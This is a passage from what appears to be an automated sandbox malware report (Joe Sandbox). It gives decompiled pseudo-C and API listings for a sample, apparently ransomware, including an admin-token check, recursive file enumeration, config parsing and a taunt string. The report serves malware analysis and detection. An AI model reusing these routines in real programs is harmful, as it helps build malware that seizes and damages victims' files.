				_t13 = AllocateAndInitializeSid( &_v20, 2, 0x20, 0x220, 0, 0, 0, 0, 0, 0,  &_v12);
				if(_t13 != 0) {
					_t15 = GetProcAddress(GetModuleHandleA("advapi32.dll"), "CheckTokenMembership");
					_t16 =  *_t15(0, _v12,  &_v8);
					asm("sbb eax, eax");
					_v8 = _v8 &  ~_t16;
					FreeSid(_v12);
					return _v8;
				} else {
					return _t13;
				}
			}










                                        0x0f9d3aa9
                                        0x0f9d3ac9
                                        0x0f9d3ad0
                                        0x0f9d3ad8
                                        0x0f9d3aef
                                        0x0f9d3afe
                                        0x0f9d3b05
                                        0x0f9d3b07
                                        0x0f9d3b0a
                                        0x0f9d3b16
                                        0x0f9d3add
                                        0x0f9d3add
                                        0x0f9d3add

                                        APIs
                                        • AllocateAndInitializeSid.ADVAPI32(00000000,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 0F9D3AD0
                                        • GetModuleHandleA.KERNEL32(advapi32.dll), ref: 0F9D3AE3
                                        • GetProcAddress.KERNEL32(00000000,CheckTokenMembership), ref: 0F9D3AEF
                                        • FreeSid.ADVAPI32(?), ref: 0F9D3B0A
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000E.00000002.315641012.000000000F9D1000.00000020.00000001.01000000.00000005.sdmp, Offset: 0F9D0000, based on PE: true
                                        • Associated: 0000000E.00000002.315632959.000000000F9D0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 0000000E.00000002.315651936.000000000F9DA000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 0000000E.00000002.315662109.000000000F9E2000.00000008.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 0000000E.00000002.315667422.000000000F9E4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_14_2_f9d0000_isqmkp.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: AddressAllocateFreeHandleInitializeModuleProc
                                        • String ID: CheckTokenMembership$advapi32.dll
                                        • API String ID: 3309497720-1888249752
                                        • Opcode ID: 18914138cd8a4ae0d84f515ac4a858540ed74b990cd854cf46b19445d37c76dd
                                        • Instruction ID: fd64464d9024e11344a8e38af1d1083c35d9bf8365ec0ac1056304d397eabc77
                                        • Opcode Fuzzy Hash: 18914138cd8a4ae0d84f515ac4a858540ed74b990cd854cf46b19445d37c76dd
                                        • Instruction Fuzzy Hash: 56F04F30A4530DBBEF109BE4DC0AFADB778EB04716F204584F905E6182E7B866648B55
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 0F9D6D09 Relevance: 9.0, APIs: 6, Instructions: 48stringfileCOMMON
                                        Download Yara Rule
                                        C-Code - Quality: 94%
                                        			E0F9D6D09() {
				intOrPtr* _t34;
				intOrPtr* _t38;
				void* _t40;
				WCHAR* _t46;
				void* _t51;

				do {
					if(lstrcmpW(_t51 - 0x238, ".") != 0 && lstrcmpW(_t51 - 0x238, L"..") != 0) {
						lstrcatW(_t46, _t51 - 0x238);
						if(( *(_t51 - 0x264) & 0x00000010) == 0) {
							 *((intOrPtr*)(_t51 - 0xc)) =  *_t38;
							 *_t38 =  *_t38 + E0F9D6950(_t46, _t51 - 0x264, __eflags, _t40,  *((intOrPtr*)(_t51 + 8)));
							asm("adc [ebx+0x4], edx");
							__eflags =  *((intOrPtr*)(_t38 + 4)) -  *((intOrPtr*)(_t38 + 4));
							if(__eflags <= 0) {
								if(__eflags < 0) {
									L8:
									_t34 =  *((intOrPtr*)(_t51 + 0xc));
									 *_t34 =  *_t34 + 1;
									__eflags =  *_t34;
								} else {
									__eflags =  *((intOrPtr*)(_t51 - 0xc)) -  *_t38;
									if(__eflags < 0) {
										goto L8;
									}
								}
							}
						} else {
							E0F9D6C90(lstrcatW(_t46, "\\"), _t46,  *((intOrPtr*)(_t51 - 0x14)),  *((intOrPtr*)(_t51 + 8)),  *((intOrPtr*)(_t51 + 0xc)), _t38);
						}
						 *((short*)( *((intOrPtr*)(_t51 - 0x10)))) = 0;
					}
				} while (FindNextFileW( *(_t51 - 8), _t51 - 0x264) != 0);
				FindClose( *(_t51 - 8));
				return 0;
			}








                                        0x0f9d6d10
                                        0x0f9d6d24
                                        0x0f9d6d48
                                        0x0f9d6d51
                                        0x0f9d6d82
                                        0x0f9d6d8d
                                        0x0f9d6d8f
                                        0x0f9d6d92
                                        0x0f9d6d95
                                        0x0f9d6d97
                                        0x0f9d6da0
                                        0x0f9d6da0
                                        0x0f9d6da3
                                        0x0f9d6da3
                                        0x0f9d6d99
                                        0x0f9d6d9c
                                        0x0f9d6d9e
                                        0x00000000
                                        0x00000000
                                        0x0f9d6d9e
                                        0x0f9d6d97
                                        0x0f9d6d53
                                        0x0f9d6d67
                                        0x0f9d6d6c
                                        0x0f9d6db0
                                        0x0f9d6db0
                                        0x0f9d6dc3
                                        0x0f9d6dce
                                        0x0f9d6ddc

                                        APIs
                                        • lstrcmpW.KERNEL32(?,0F9DFEC8,?,?), ref: 0F9D6D1C
                                        • lstrcmpW.KERNEL32(?,0F9DFECC,?,?), ref: 0F9D6D36
                                        • lstrcatW.KERNEL32(00000000,?), ref: 0F9D6D48
                                        • lstrcatW.KERNEL32(00000000,0F9DFEFC), ref: 0F9D6D59
                                          • Part of subcall function 0F9D6C90: lstrlenW.KERNEL32(00000000,00000000,?,?), ref: 0F9D6CC3
                                          • Part of subcall function 0F9D6C90: lstrcatW.KERNEL32(00000000,0F9DFEC4), ref: 0F9D6CDB
                                          • Part of subcall function 0F9D6C90: FindFirstFileW.KERNEL32(00000000,?,?,?), ref: 0F9D6CE5
                                        • FindNextFileW.KERNEL32(00003000,?,?,?), ref: 0F9D6DBD
                                        • FindClose.KERNEL32(00003000,?,?), ref: 0F9D6DCE
                                        Memory Dump Source
                                        • Source File: 0000000E.00000002.315641012.000000000F9D1000.00000020.00000001.01000000.00000005.sdmp, Offset: 0F9D0000, based on PE: true
                                        • Associated: 0000000E.00000002.315632959.000000000F9D0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 0000000E.00000002.315651936.000000000F9DA000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 0000000E.00000002.315662109.000000000F9E2000.00000008.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 0000000E.00000002.315667422.000000000F9E4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_14_2_f9d0000_isqmkp.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Findlstrcat$Filelstrcmp$CloseFirstNextlstrlen
                                        • String ID:
                                        • API String ID: 2032009209-0
                                        • Opcode ID: 101370233d85c7fbbd36b4bdc30c3d7d908449c2eedbbae6644d54c7daa7327c
                                        • Instruction ID: c2b7066f0b0fcd1e62520437090976c7bdf39c3eadaeb314cad133264c0ec824
                                        • Opcode Fuzzy Hash: 101370233d85c7fbbd36b4bdc30c3d7d908449c2eedbbae6644d54c7daa7327c
                                        • Instruction Fuzzy Hash: 88019231A04209AADF11AF64EC48BEE7BBCEF85301F2080A6F905D5092DB359B65DF20
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 0F9D3200 Relevance: 8.8, APIs: 7, Instructions: 73memorystringCOMMON
                                        Download Yara Rule
                                        C-Code - Quality: 100%
                                        			E0F9D3200(void* __ecx, CHAR* _a4, intOrPtr _a8) {
				char _t5;
				char _t6;
				intOrPtr _t8;
				int _t10;
				CHAR* _t13;
				int _t15;
				void* _t18;
				CHAR* _t21;
				CHAR* _t23;

				_t23 = _a4;
				_t18 = __ecx;
				_t5 =  *_t23;
				if(_t5 == 0) {
					L4:
					_t6 =  *_t23;
					if(_t6 == 0x7d) {
						goto L10;
					} else {
						_t21 = _t23;
						if(_t6 != 0) {
							while( *_t21 != 0x7d) {
								_t21 =  &(_t21[1]);
								if( *_t21 != 0) {
									continue;
								} else {
								}
								goto L12;
							}
							 *_t21 = 0;
						}
						L12:
						_t8 = _a8;
						if(_t8 != 1) {
							if(_t8 == 2) {
								_t10 = lstrlenA(_t23);
								_t13 = HeapAlloc(GetProcessHeap(), 8, _t10 + 1);
								 *(_t18 + 8) = _t13;
								goto L16;
							}
						} else {
							_t15 = lstrlenA(_t23);
							_t13 = HeapAlloc(GetProcessHeap(), 8, _t15 + 1);
							 *(_t18 + 4) = _t13;
							L16:
							if(_t13 != 0) {
								lstrcpyA(_t13, _t23);
							}
						}
						 *_t21 = 0x7d;
						return 1;
					}
				} else {
					while(_t5 != 0x7d) {
						_t23 =  &(_t23[1]);
						if(_t5 == 0x3d) {
							goto L4;
						} else {
							_t5 =  *_t23;
							if(_t5 != 0) {
								continue;
							} else {
								goto L4;
							}
						}
						goto L19;
					}
					L10:
					return 0;
				}
				L19:
			}












                                        0x0f9d3205
                                        0x0f9d3208
                                        0x0f9d320a
                                        0x0f9d320e
                                        0x0f9d321f
                                        0x0f9d321f
                                        0x0f9d3223
                                        0x00000000
                                        0x0f9d3225
                                        0x0f9d3226
                                        0x0f9d322a
                                        0x0f9d3230
                                        0x0f9d3235
                                        0x0f9d3239
                                        0x00000000
                                        0x00000000
                                        0x0f9d323b
                                        0x00000000
                                        0x0f9d3239
                                        0x0f9d3245
                                        0x0f9d3245
                                        0x0f9d3248
                                        0x0f9d3248
                                        0x0f9d324e
                                        0x0f9d3270
                                        0x0f9d3273
                                        0x0f9d3284
                                        0x0f9d328a
                                        0x00000000
                                        0x0f9d328a
                                        0x0f9d3250
                                        0x0f9d3251
                                        0x0f9d3262
                                        0x0f9d3268
                                        0x0f9d328d
                                        0x0f9d328f
                                        0x0f9d3293
                                        0x0f9d3293
                                        0x0f9d328f
                                        0x0f9d3299
                                        0x0f9d32a5
                                        0x0f9d32a5
                                        0x0f9d3210
                                        0x0f9d3210
                                        0x0f9d3214
                                        0x0f9d3217
                                        0x00000000
                                        0x0f9d3219
                                        0x0f9d3219
                                        0x0f9d321d
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x0f9d321d
                                        0x00000000
                                        0x0f9d3217
                                        0x0f9d323e
                                        0x0f9d3242
                                        0x0f9d3242
                                        0x00000000

                                        APIs
                                        • lstrlenA.KERNEL32(0F9D52F0,00000000,?,0F9D52F1,?,0F9D34BF,0F9D52F1,00000001,0F9D52F1,00000000,00000000,74CB6980,?,?,0F9D52F0,00000000), ref: 0F9D3251
                                        • GetProcessHeap.KERNEL32(00000008,00000001,?,0F9D34BF,0F9D52F1,00000001,0F9D52F1,00000000,00000000,74CB6980,?,?,0F9D52F0,00000000), ref: 0F9D325B
                                        • HeapAlloc.KERNEL32(00000000,?,0F9D34BF,0F9D52F1,00000001,0F9D52F1,00000000,00000000,74CB6980,?,?,0F9D52F0,00000000), ref: 0F9D3262
                                        • lstrlenA.KERNEL32(0F9D52F0,00000000,?,0F9D52F1,?,0F9D34BF,0F9D52F1,00000001,0F9D52F1,00000000,00000000,74CB6980,?,?,0F9D52F0,00000000), ref: 0F9D3273
                                        • GetProcessHeap.KERNEL32(00000008,00000001,?,0F9D34BF,0F9D52F1,00000001,0F9D52F1,00000000,00000000,74CB6980,?,?,0F9D52F0,00000000), ref: 0F9D327D
                                        • HeapAlloc.KERNEL32(00000000,?,0F9D34BF,0F9D52F1,00000001,0F9D52F1,00000000,00000000,74CB6980,?,?,0F9D52F0,00000000), ref: 0F9D3284
                                        • lstrcpyA.KERNEL32(00000000,0F9D52F0,?,0F9D34BF,0F9D52F1,00000001,0F9D52F1,00000000,00000000,74CB6980,?,?,0F9D52F0,00000000), ref: 0F9D3293
                                        Memory Dump Source
                                        • Source File: 0000000E.00000002.315641012.000000000F9D1000.00000020.00000001.01000000.00000005.sdmp, Offset: 0F9D0000, based on PE: true
                                        • Associated: 0000000E.00000002.315632959.000000000F9D0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 0000000E.00000002.315651936.000000000F9DA000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 0000000E.00000002.315662109.000000000F9E2000.00000008.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 0000000E.00000002.315667422.000000000F9E4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_14_2_f9d0000_isqmkp.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Heap$AllocProcesslstrlen$lstrcpy
                                        • String ID:
                                        • API String ID: 511007297-0
                                        • Opcode ID: 207fc6d70b0720cc3de088976f2a1f5535eec1b52208e9fd038fb4db2c3f1e61
                                        • Instruction ID: 9257a7390a5bef036132b5f92ebc87f15ae39da7b187e8b39800f2465428626d
                                        • Opcode Fuzzy Hash: 207fc6d70b0720cc3de088976f2a1f5535eec1b52208e9fd038fb4db2c3f1e61
                                        • Instruction Fuzzy Hash: 9A11B9318091556EEB310F689848FA67B6CEF12362F74C505FAC5CB283C73994A68772
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 0F9D33E0 Relevance: 7.6, APIs: 5, Instructions: 101memorystringCOMMON
                                        Download Yara Rule
                                        C-Code - Quality: 97%
                                        			E0F9D33E0(int* __ecx, void* __eflags, CHAR* _a4) {
				int* _v8;
				void* _t8;
				char _t10;
				void* _t14;
				void* _t15;
				char _t18;
				char _t19;
				int _t20;
				CHAR* _t23;
				CHAR* _t26;
				CHAR* _t35;
				CHAR* _t40;

				_push(__ecx);
				_t26 = _a4;
				_t37 = __ecx;
				_v8 = __ecx;
				__ecx[3] = _t26;
				_t8 = E0F9D32B0(__ecx);
				if(_t8 == 0 || _t8 == 0xffffffff) {
					ExitProcess(0);
				}
				if(E0F9D3320(__ecx) == 0) {
					 *__ecx = 0;
					_t10 =  *_t26;
					if(_t10 == 0) {
						goto L4;
					} else {
						do {
							if(_t10 == 0x7b) {
								_t26 =  &(_t26[1]);
								_t14 = E0F9D3190(_t26);
								if(_t14 != 0) {
									_t15 = _t14 - 1;
									if(_t15 == 0) {
										E0F9D3200(_t37, _t26, 1);
									} else {
										if(_t15 == 1) {
											_t18 =  *_t26;
											_t35 = _t26;
											if(_t18 == 0) {
												L15:
												_t19 =  *_t35;
												if(_t19 != 0x7d) {
													_t40 = _t35;
													if(_t19 != 0) {
														while( *_t40 != 0x7d) {
															_t40 =  &(_t40[1]);
															if( *_t40 != 0) {
																continue;
															} else {
															}
															goto L21;
														}
														 *_t40 = 0;
													}
													L21:
													_t20 = lstrlenA(_t35);
													_t23 = HeapAlloc(GetProcessHeap(), 8, _t20 + 1);
													 *(_v8 + 8) = _t23;
													if(_t23 != 0) {
														lstrcpyA(_t23, _t35);
													}
													 *_t40 = 0x7d;
													_t37 = _v8;
												}
											} else {
												while(_t18 != 0x7d) {
													_t35 =  &(_t35[1]);
													if(_t18 == 0x3d) {
														goto L15;
													} else {
														_t18 =  *_t35;
														if(_t18 != 0) {
															continue;
														} else {
															goto L15;
														}
													}
													goto L25;
												}
											}
										}
									}
								}
							}
							L25:
							_t7 =  &(_t26[1]); // 0x850f00e8
							_t10 =  *_t7;
							_t26 =  &(_t26[1]);
						} while (_t10 != 0);
						return 1;
					}
				} else {
					 *__ecx = 1;
					L4:
					return 1;
				}
			}















                                        0x0f9d33e3
                                        0x0f9d33e5
                                        0x0f9d33e9
                                        0x0f9d33eb
                                        0x0f9d33ee
                                        0x0f9d33f1
                                        0x0f9d33f8
                                        0x0f9d34db
                                        0x0f9d34db
                                        0x0f9d3410
                                        0x0f9d3425
                                        0x0f9d342b
                                        0x0f9d342f
                                        0x00000000
                                        0x0f9d3431
                                        0x0f9d3432
                                        0x0f9d3434
                                        0x0f9d343a
                                        0x0f9d3441
                                        0x0f9d3444
                                        0x0f9d344a
                                        0x0f9d344b
                                        0x0f9d34ba
                                        0x0f9d344d
                                        0x0f9d344e
                                        0x0f9d3450
                                        0x0f9d3452
                                        0x0f9d3456
                                        0x0f9d3467
                                        0x0f9d3467
                                        0x0f9d346b
                                        0x0f9d346d
                                        0x0f9d3471
                                        0x0f9d3473
                                        0x0f9d3478
                                        0x0f9d347c
                                        0x00000000
                                        0x00000000
                                        0x0f9d347e
                                        0x00000000
                                        0x0f9d347c
                                        0x0f9d3480
                                        0x0f9d3480
                                        0x0f9d3483
                                        0x0f9d3484
                                        0x0f9d3495
                                        0x0f9d349e
                                        0x0f9d34a3
                                        0x0f9d34a7
                                        0x0f9d34a7
                                        0x0f9d34ad
                                        0x0f9d34b0
                                        0x0f9d34b0
                                        0x00000000
                                        0x0f9d3458
                                        0x0f9d345c
                                        0x0f9d345f
                                        0x00000000
                                        0x0f9d3461
                                        0x0f9d3461
                                        0x0f9d3465
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x0f9d3465
                                        0x00000000
                                        0x0f9d345f
                                        0x0f9d3458
                                        0x0f9d3456
                                        0x0f9d344e
                                        0x0f9d344b
                                        0x0f9d3444
                                        0x0f9d34bf
                                        0x0f9d34bf
                                        0x0f9d34bf
                                        0x0f9d34c2
                                        0x0f9d34c3
                                        0x0f9d34d6
                                        0x0f9d34d6
                                        0x0f9d3412
                                        0x0f9d3412
                                        0x0f9d3418
                                        0x0f9d3422
                                        0x0f9d3422

                                        APIs
                                          • Part of subcall function 0F9D32B0: lstrlenA.KERNEL32(?,00000000,?,0F9D52F0,?,?,0F9D33F6,00000000,74CB6980,?,?,0F9D52F0,00000000), ref: 0F9D32C5
                                          • Part of subcall function 0F9D32B0: lstrlenA.KERNEL32(?,?,0F9D33F6,00000000,74CB6980,?,?,0F9D52F0,00000000), ref: 0F9D32EE
                                        • lstrlenA.KERNEL32(0F9D52F1,0F9D52F1,00000000,00000000,74CB6980,?,?,0F9D52F0,00000000), ref: 0F9D3484
                                        • GetProcessHeap.KERNEL32(00000008,00000001,?,0F9D52F0,00000000), ref: 0F9D348E
                                        • HeapAlloc.KERNEL32(00000000,?,0F9D52F0,00000000), ref: 0F9D3495
                                        • lstrcpyA.KERNEL32(00000000,0F9D52F1,?,0F9D52F0,00000000), ref: 0F9D34A7
                                        • ExitProcess.KERNEL32 ref: 0F9D34DB
                                        Memory Dump Source
                                        • Source File: 0000000E.00000002.315641012.000000000F9D1000.00000020.00000001.01000000.00000005.sdmp, Offset: 0F9D0000, based on PE: true
                                        • Associated: 0000000E.00000002.315632959.000000000F9D0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 0000000E.00000002.315651936.000000000F9DA000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 0000000E.00000002.315662109.000000000F9E2000.00000008.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 0000000E.00000002.315667422.000000000F9E4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_14_2_f9d0000_isqmkp.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: lstrlen$HeapProcess$AllocExitlstrcpy
                                        • String ID:
                                        • API String ID: 1867342102-0
                                        • Opcode ID: f40ee0010914772b7a7c920ddefe84d5ddf38b72419f311ca54df484ae5f3618
                                        • Instruction ID: 2eadb3a7e336fa3221ecfededf03f1dda319bd8864a1b048a5c50baba3533d3b
                                        • Opcode Fuzzy Hash: f40ee0010914772b7a7c920ddefe84d5ddf38b72419f311ca54df484ae5f3618
                                        • Instruction Fuzzy Hash: F33105315082455AEB320F689844FF57B6C9F82352FB8C189F885CB2C3D62D688687A3
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 0F9D3B20 Relevance: 7.6, APIs: 5, Instructions: 53COMMON
                                        Download Yara Rule
                                        APIs
                                        • _memset.LIBCMT ref: 0F9D3B72
                                        • VerSetConditionMask.KERNEL32(00000000,00000000,00000002,00000003,00000001,00000003,00000020,00000003,?,?,00000000), ref: 0F9D3B96
                                        • VerSetConditionMask.KERNEL32(00000000,?,?,?,00000000), ref: 0F9D3B9A
                                        • VerSetConditionMask.KERNEL32(00000000,?,?,?,?,00000000), ref: 0F9D3B9E
                                        • VerifyVersionInfoW.KERNEL32(0000011C,00000023,00000000), ref: 0F9D3BC5
                                        Memory Dump Source
                                        • Source File: 0000000E.00000002.315641012.000000000F9D1000.00000020.00000001.01000000.00000005.sdmp, Offset: 0F9D0000, based on PE: true
                                        • Associated: 0000000E.00000002.315632959.000000000F9D0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 0000000E.00000002.315651936.000000000F9DA000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 0000000E.00000002.315662109.000000000F9E2000.00000008.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 0000000E.00000002.315667422.000000000F9E4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_14_2_f9d0000_isqmkp.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: ConditionMask$InfoVerifyVersion_memset
                                        • String ID:
                                        • API String ID: 3299124433-0
                                        • Opcode ID: 71180fe03a982e302bf0205fc68ac21d9800b20cc7769f97f1eadcb03e161e13
                                        • Instruction ID: b908308a20444b2cbfb41d379da8936264d4ba24b459d59ea5ff71969377bbf9
                                        • Opcode Fuzzy Hash: 71180fe03a982e302bf0205fc68ac21d9800b20cc7769f97f1eadcb03e161e13
                                        • Instruction Fuzzy Hash: C9111BB0D4031C6EEB609F64DC0ABEA7ABCEB09704F008199A648E61C1D6B94B948FD5
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 0F9D4CD0 Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 116stringCOMMON
                                        Download Yara Rule
                                        C-Code - Quality: 97%
                                        			E0F9D4CD0(intOrPtr* __ecx, CHAR* __edx, intOrPtr* _a4) {
				CHAR* _v8;
				char _v12;
				char _v20;
				char _t16;
				char _t20;
				char _t21;
				intOrPtr* _t24;
				intOrPtr _t25;
				intOrPtr _t26;
				intOrPtr* _t29;
				CHAR* _t33;
				intOrPtr _t34;
				intOrPtr _t35;
				void* _t38;
				void* _t41;
				intOrPtr* _t42;
				void* _t47;
				void* _t49;
				intOrPtr* _t51;
				CHAR* _t53;

				asm("movq xmm0, [0xf9dfa84]");
				_t16 =  *0xf9dfa8c; // 0x0
				_t29 = _a4;
				_v8 = __edx;
				_t51 = __ecx;
				asm("movq [ebp-0x10], xmm0");
				_v12 = _t16;
				if( *_t29 == 0) {
					L11:
					if(_t51 == 0) {
						goto L10;
					} else {
						if(_v20 == 0) {
							L22:
							if(_t51 == 0) {
								goto L10;
							} else {
								_t53 = _t51 + lstrlenA( &_v20);
								while(1) {
									_t20 =  *_t53;
									if(_t20 >= 0x30 && _t20 <= 0x39) {
										break;
									}
									_t53 =  &(_t53[1]);
								}
								_t33 = _t53;
								while(1) {
									_t21 =  *_t33;
									if(_t21 < 0x30 || _t21 > 0x39) {
										goto L30;
									}
									L31:
									_t33 =  &(_t33[1]);
									continue;
									L30:
									if(_t21 == 0x2e) {
										goto L31;
									}
									 *_t33 = 0;
									return lstrcpyA(_v8, _t53);
									goto L33;
								}
							}
						} else {
							_t34 =  *_t51;
							if(_t34 != 0) {
								_t47 = _t51 -  &_v20;
								do {
									_t24 =  &_v20;
									if(_t34 == 0) {
										L19:
										if( *_t24 == 0) {
											goto L22;
										} else {
											goto L20;
										}
									} else {
										while(1) {
											_t35 =  *_t24;
											if(_t35 == 0) {
												goto L22;
											}
											_t41 =  *((char*)(_t47 + _t24)) - _t35;
											if(_t41 != 0) {
												goto L19;
											} else {
												_t24 = _t24 + 1;
												if( *((intOrPtr*)(_t47 + _t24)) != _t41) {
													continue;
												} else {
													goto L19;
												}
											}
											goto L33;
										}
										goto L22;
									}
									goto L33;
									L20:
									_t34 =  *((intOrPtr*)(_t51 + 1));
									_t51 = _t51 + 1;
									_t47 = _t47 + 1;
								} while (_t34 != 0);
							}
							goto L10;
						}
					}
				} else {
					_t25 =  *__ecx;
					if(_t25 == 0) {
						L10:
						return lstrcpyA(_v8, "fabian wosar <3");
					} else {
						_t49 = __ecx - _t29;
						do {
							_t42 = _t29;
							if(_t25 == 0) {
								L8:
								if( *_t42 == 0) {
									goto L11;
								} else {
									goto L9;
								}
							} else {
								while(1) {
									_t26 =  *_t42;
									if(_t26 == 0) {
										goto L11;
									}
									_t38 =  *((char*)(_t49 + _t42)) - _t26;
									if(_t38 != 0) {
										goto L8;
									} else {
										_t42 = _t42 + 1;
										if( *((intOrPtr*)(_t49 + _t42)) != _t38) {
											continue;
										} else {
											goto L8;
										}
									}
									goto L33;
								}
								goto L11;
							}
							goto L33;
							L9:
							_t25 =  *((intOrPtr*)(_t51 + 1));
							_t51 = _t51 + 1;
							_t49 = _t49 + 1;
						} while (_t25 != 0);
						goto L10;
					}
				}
				L33:
			}























                                        0x0f9d4cd6
                                        0x0f9d4cde
                                        0x0f9d4ce4
                                        0x0f9d4ce9
                                        0x0f9d4cec
                                        0x0f9d4cf1
                                        0x0f9d4cf6
                                        0x0f9d4cf9
                                        0x0f9d4d4a
                                        0x0f9d4d4c
                                        0x00000000
                                        0x0f9d4d4e
                                        0x0f9d4d52
                                        0x0f9d4d8f
                                        0x0f9d4d91
                                        0x00000000
                                        0x0f9d4d93
                                        0x0f9d4d9d
                                        0x0f9d4da0
                                        0x0f9d4da0
                                        0x0f9d4da4
                                        0x00000000
                                        0x00000000
                                        0x0f9d4daa
                                        0x0f9d4daa
                                        0x0f9d4dad
                                        0x0f9d4db0
                                        0x0f9d4db0
                                        0x0f9d4db4
                                        0x00000000
                                        0x00000000
                                        0x0f9d4dbe
                                        0x0f9d4dbe
                                        0x00000000
                                        0x0f9d4dba
                                        0x0f9d4dbc
                                        0x00000000
                                        0x00000000
                                        0x0f9d4dc5
                                        0x0f9d4dd4
                                        0x00000000
                                        0x0f9d4dd4
                                        0x0f9d4db0
                                        0x0f9d4d54
                                        0x0f9d4d54
                                        0x0f9d4d58
                                        0x0f9d4d5f
                                        0x0f9d4d61
                                        0x0f9d4d61
                                        0x0f9d4d66
                                        0x0f9d4d7f
                                        0x0f9d4d82
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x0f9d4d68
                                        0x0f9d4d68
                                        0x0f9d4d68
                                        0x0f9d4d6c
                                        0x00000000
                                        0x00000000
                                        0x0f9d4d75
                                        0x0f9d4d77
                                        0x00000000
                                        0x0f9d4d79
                                        0x0f9d4d79
                                        0x0f9d4d7d
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x0f9d4d7d
                                        0x00000000
                                        0x0f9d4d77
                                        0x00000000
                                        0x0f9d4d68
                                        0x00000000
                                        0x0f9d4d84
                                        0x0f9d4d84
                                        0x0f9d4d87
                                        0x0f9d4d88
                                        0x0f9d4d89
                                        0x0f9d4d8d
                                        0x00000000
                                        0x0f9d4d58
                                        0x0f9d4d52
                                        0x0f9d4cfb
                                        0x0f9d4cfb
                                        0x0f9d4cff
                                        0x0f9d4d35
                                        0x0f9d4d49
                                        0x0f9d4d01
                                        0x0f9d4d03
                                        0x0f9d4d05
                                        0x0f9d4d05
                                        0x0f9d4d09
                                        0x0f9d4d27
                                        0x0f9d4d2a
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x0f9d4d0b
                                        0x0f9d4d10
                                        0x0f9d4d10
                                        0x0f9d4d14
                                        0x00000000
                                        0x00000000
                                        0x0f9d4d1d
                                        0x0f9d4d1f
                                        0x00000000
                                        0x0f9d4d21
                                        0x0f9d4d21
                                        0x0f9d4d25
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x0f9d4d25
                                        0x00000000
                                        0x0f9d4d1f
                                        0x00000000
                                        0x0f9d4d10
                                        0x00000000
                                        0x0f9d4d2c
                                        0x0f9d4d2c
                                        0x0f9d4d2f
                                        0x0f9d4d30
                                        0x0f9d4d31
                                        0x00000000
                                        0x0f9d4d05
                                        0x0f9d4cff
                                        0x00000000

                                        APIs
                                        • lstrcpyA.KERNEL32(?,fabian wosar <3,?,0F9D5034), ref: 0F9D4D3D
                                        • lstrlenA.KERNEL32(00000000,?,0F9D5034), ref: 0F9D4D97
                                        • lstrcpyA.KERNEL32(?,?,?,0F9D5034), ref: 0F9D4DC8
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000E.00000002.315641012.000000000F9D1000.00000020.00000001.01000000.00000005.sdmp, Offset: 0F9D0000, based on PE: true
                                        • Associated: 0000000E.00000002.315632959.000000000F9D0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 0000000E.00000002.315651936.000000000F9DA000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 0000000E.00000002.315662109.000000000F9E2000.00000008.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 0000000E.00000002.315667422.000000000F9E4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_14_2_f9d0000_isqmkp.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: lstrcpy$lstrlen
                                        • String ID: fabian wosar <3
                                        • API String ID: 367037083-1724090804
                                        • Opcode ID: 412a329dc0b7dbad1ccf363e3dd7b9b465e37444ced1a8d346a901f423907529
                                        • Instruction ID: 673b918679bf427c4e54f02d159f0e369767471d9fc70112bb3fadab08324379
                                        • Opcode Fuzzy Hash: 412a329dc0b7dbad1ccf363e3dd7b9b465e37444ced1a8d346a901f423907529
                                        • Instruction Fuzzy Hash: 6C3105258082A94BDB32CE7C54643FABFA9AF47201FB8D589E8C55B287D231744EC790
                                        Uniqueness

                                        Uniqueness Score: -1.00%

